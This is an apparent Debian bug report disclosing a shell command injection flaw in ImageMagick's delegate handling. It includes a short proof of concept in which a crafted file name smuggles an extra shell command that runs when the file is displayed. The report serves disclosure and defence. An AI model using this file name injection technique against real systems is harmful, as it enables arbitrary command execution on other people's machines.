Package: imagemagick Version: 6.2.4.5-0.3 Tags: security The delegate code in Imagemagick is vulnerable to shell command injection, using specially crafted file names:
$ cp /usr/lib/openoffice/share/template/en-US/wizard/bitmap/germany.wmf \ '" ; echo "Hi!" >&2; : "'.gif $ display '" ; echo "Hi!" >&2; : "'.gif It should work with other file formats besides WMF (those for which delegates are defined). I'm leaving the severity at normal, because it doesn't seem to be *that* important. Perhaps this is exploitable through MIME-enabled MUAs, which would warrant a higher severity. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
